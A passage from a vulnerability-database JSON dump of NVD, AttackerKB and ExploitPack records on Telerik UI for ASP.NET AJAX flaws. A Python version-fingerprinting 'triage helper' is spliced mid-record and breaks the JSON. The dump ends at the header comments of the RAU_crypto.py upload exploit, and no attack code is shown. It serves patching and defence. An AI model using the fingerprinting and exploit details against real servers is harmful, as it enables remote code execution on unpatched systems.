"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2019-18935", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-07-27T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T23:28:11", "description": "An issue was discovered in Quest KACE Desktop Authority before 11.2. This vulnerability allows attackers to execute remote code through a deserialization exploitation in the RadAsyncUpload function of ASP.NET AJAX. An attacker can leverage this vulnerability when the encryption keys are known (due to the presence of CVE-2017-11317, CVE-2017-11357, or other means). 
A default setting for the type whitelisting feature in more current versions of ASP.NET AJAX prevents exploitation.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-44029", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2021-44029"], "modified": "2022-01-10T00:00:00", "id": "AKB:A6C918C9-3E53-4E56-AE61-3832C73F821D", "href": "https://attackerkb.com/topics/VA7jz1STSt/cve-2021-44029", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-01T00:22:48", "description": "Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise.\n\n \n**Recent 
assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-03T00:00:00", "type": "attackerkb", "title": "CVE-2017-9248", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2020-06-05T00:00:00", "id": "AKB:F65287D3-DA1A-4B44-BDB0-9E3210398F75", "href": "https://attackerkb.com/topics/haGug1Zajy/cve-2017-9248", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T02:01:29", "description": "Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T00:00:00", "type": "attackerkb", "title": "CVE-2017-11317", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2020-06-05T00:00:00", "id": "AKB:971956B9-232E-41FA-B307-2078E26F310E", "href": "https://attackerkb.com/topics/RlhpFjxJmB/cve-2017-11317", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T22:05:34", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. 
In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "type": "cve", "title": "CVE-2019-18935", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2020-10-20T22:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-07-15T05:49:55", "description": "File upload vulnerability in GFI Mail Archiver versions up to and including 15.1 via insecure implementation of Telerik Web UI plugin which is affected by CVE-2014-2217, and CVE-2017-11317.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T21:15:00", "type": "cve", "title": "CVE-2021-29281", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217", "CVE-2017-11317", "CVE-2021-29281"], "modified": "2022-07-15T02:08:00", "cpe": [], "id": "CVE-2021-29281", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-29281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T19:47:29", "description": "An issue was discovered in Quest KACE Desktop Authority before 11.2. This vulnerability allows attackers to execute remote code through a deserialization exploitation in the RadAsyncUpload function of ASP.NET AJAX. An attacker can leverage this vulnerability when the encryption keys are known (due to the presence of CVE-2017-11317, CVE-2017-11357, or other means). 
A default setting for the type whitelisting feature in more current versions of ASP.NET AJAX prevents exploitation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-22T06:15:00", "type": "cve", "title": "CVE-2021-44029", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2021-44029"], "modified": "2022-01-03T20:54:00", "cpe": [], "id": "CVE-2021-44029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44029", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T13:31:25", "description": "Cross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes.", "cvss3": {}, "published": "2014-09-26T21:55:00", "type": "cve", "title": "CVE-2014-4958", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 
true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4958"], "modified": "2015-09-16T19:30:00", "cpe": ["cpe:/a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20", "cpe:/a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35"], "id": "CVE-2014-4958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T22:19:17", "description": "Path traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. NOTE: RadChart was discontinued in 2014 in favor of RadHtmlChart. All RadChart versions were affected. 
To avoid this vulnerability, you must remove RadChart's HTTP handler from a web.config (its type is Telerik.Web.UI.ChartHttpHandler).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-13T18:15:00", "type": "cve", "title": "CVE-2019-19790", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19790"], "modified": "2019-12-30T16:59:00", "cpe": ["cpe:/a:telerik:radchart:*", "cpe:/a:telerik:ui_for_asp.net_ajax:-"], "id": "CVE-2019-19790", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:-:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:radchart:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:55:56", "description": "Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads 
or downloads, XSS, or ASP.NET ViewState compromise.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-03T19:29:00", "type": "cve", "title": "CVE-2017-9248", "cwe": ["CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.503", "cpe:/a:telerik:sitefinity_cms:10.0.6401.0"], "id": "CVE-2017-9248", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:sitefinity_cms:10.0.6401.0:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.503:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:33:12", "description": "Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T17:29:00", "type": "cve", "title": "CVE-2017-11317", "cwe": ["CWE-326"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2020-10-20T22:15:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2016.3.1027", "cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.503", "cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.621"], "id": "CVE-2017-11317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:2016.3.1027:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.621:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.503:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:33:38", "description": "Absolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value.", "cvss3": {}, "published": "2014-12-25T21:59:00", "type": "cve", "title": "CVE-2014-2217", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217"], "modified": "2014-12-29T17:53:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2014.3.1209"], "id": "CVE-2014-2217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:2014.3.1209:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:33:59", "description": "Progress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T17:29:00", "type": "cve", "title": "CVE-2017-11357", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
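Triage helper, added here as an example and not part of the NVD records above or of the RAU_crypto tool: it pulls the Telerik.Web.UI build out of an HTTP response with the same three patterns RAU_crypto's getVersion() uses (an HTML comment, a URL-encoded "Version%3d...%2c" in a resource link, or a plain "Version=...,") and maps it onto the version ranges the NVD descriptions above state. The build numbers assumed for the release names NVD uses (Q3 2012 SP2 = 2012.3.1308, R2 2017 SP1 = 2017.2.621, R2 2017 SP2 = 2017.2.711) and the sample HTML are mine, not the page's.

```python
import re
from typing import Callable, List, Optional, Tuple

Version = Tuple[int, int, int]

# The three places RAU_crypto's getVersion() looks: "<!-- 2017.1.118 -->",
# "Version%3d2017.1.118%2c" inside a WebResource/ScriptResource link, or a
# plain assembly-qualified "Version=2017.1.118,".
VERSION_RE = re.compile(
    r"(?<=<!-- )20\d{2}(?:\.\d+)+(?= -->)"
    r"|(?<=Version%3d)20\d{2}(?:\.\d+)+(?=%2c)"
    r"|(?<=Version=)20\d{2}(?:\.\d+)+(?=,)",
    re.IGNORECASE,
)


def parse_version(text: str) -> Version:
    """'2017.2.621' -> (2017, 2, 621); pre-2012 '2011.31115' -> (2011, 3, 1115).
    A fourth component (target .NET framework, e.g. '.45') is dropped."""
    parts = text.split(".")
    if len(parts) == 2:
        return (int(parts[0]), int(parts[1][0]), int(parts[1][1:]))
    return (int(parts[0]), int(parts[1]), int(parts[2]))


# Upper bounds are the NVD descriptions' wording; the build numbers for the
# release names they use are the mapping assumed here (see lead-in).
AFFECTED: List[Tuple[str, Callable[[Version], bool], str]] = [
    ("CVE-2014-2217", lambda v: v < (2012, 3, 1308),
     "RadAsyncUpload absolute path in UploadID metadata (before Q3 2012 SP2)"),
    ("CVE-2017-11317", lambda v: v < (2017, 2, 711),
     "RadAsyncUpload default encryption keys (NVD: R2 before R2 2017 SP2)"),
    ("CVE-2017-11357", lambda v: v < (2017, 2, 711),
     "RadAsyncUpload unrestricted upload (before R2 2017 SP2)"),
    ("CVE-2017-9248", lambda v: v < (2017, 2, 621),
     "DialogHandler key disclosure (before R2 2017 SP1)"),
    ("CVE-2019-18935", lambda v: v <= (2019, 3, 1023),
     "RadAsyncUpload deserialization (through 2019.3.1023; needs known keys)"),
]


def extract_version(html: str) -> Optional[str]:
    match = VERSION_RE.search(html)
    return match.group(0) if match else None


def affected_cves(version: str) -> List[str]:
    parsed = parse_version(version)
    return [cve for cve, in_range, _ in AFFECTED if in_range(parsed)]


def triage(html: str) -> Tuple[Optional[str], List[str]]:
    """Version string found in the response (or None) and the CVEs whose NVD
    range still covers it. CVE-2019-19790 is deliberately absent: its NVD
    entry gives no version bound and the fix is removing ChartHttpHandler."""
    version = extract_version(html)
    return version, (affected_cves(version) if version else [])


# Constructed sample (not a real capture): the assembly version URL-encoded in
# a ScriptResource link, one of the forms Telerik pages emit.
SAMPLE_HTML = (
    '<script src="/ScriptResource.axd?d=AbCd&amp;t=Telerik.Web.UI%2c+'
    'Version%3d2016.3.1027.45%2c+Culture%3dneutral"></script>'
)

if __name__ == "__main__":
    found, cves = triage(SAMPLE_HTML)
    print(f"Telerik.Web.UI {found}: {', '.join(cves) or 'no known issue in range'}")
```

A build inside a range is a reason to confirm, not proof: CVE-2019-18935 needs the RadAsyncUpload keys to be known (the defaults on builds before R2 2017 SP1, or keys leaked some other way), and CVE-2019-19790 depends on whether the chart handler is mapped at all, which a response body does not show.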
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357"], "modified": "2018-01-28T02:29:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax:2017.2.621"], "id": "CVE-2017-11357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:2017.2.621:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:51", "description": "\nTelerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-24T00:00:00", "title": "Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2018-01-24T00:00:00", "id": "EXPLOITPACK:AC453F09E5BC0D2354DD309296F804BF", "href": "", "sourceData": "# Exploit Title: Telerik UI for ASP.NET AJAX RadAsyncUpload uploader\n# Filename: RAU_crypto.py\n# Github: https://github.com/bao7uo/RAU_crypto\n# Date: 2018-01-23\n\n# Exploit 
Author: Paul Taylor / Foregenix Ltd\n# Website: http://www.foregenix.com/blog\n\n# Version: Telerik UI for ASP.NET AJAX \n# CVE: CVE-2017-11317, CVE-2017-11357\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload\n# Vendor Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference\n\n# Tested on: Working on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45)\n\n#!/usr/bin/python3\n\n# Author: Paul Taylor / Foregenix Ltd\n# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py\n\n# RAU crypto - Exploiting CVE-2017-11317, CVE-2017-11357\n\n# Telerik Web UI for ASP.NET AJAX\n# RadAsyncUpload hardcoded keys / insecure direct object reference\n# Arbitrary file upload\n\n# Telerik fixed in June 2017 by removing default keys in\n# versions R2 2017 SP1 (2017.2.621) and providing the ability to disable the\n# RadAsyncUpload feature in R2 2017 SP2 (2017.2.711)\n\n# 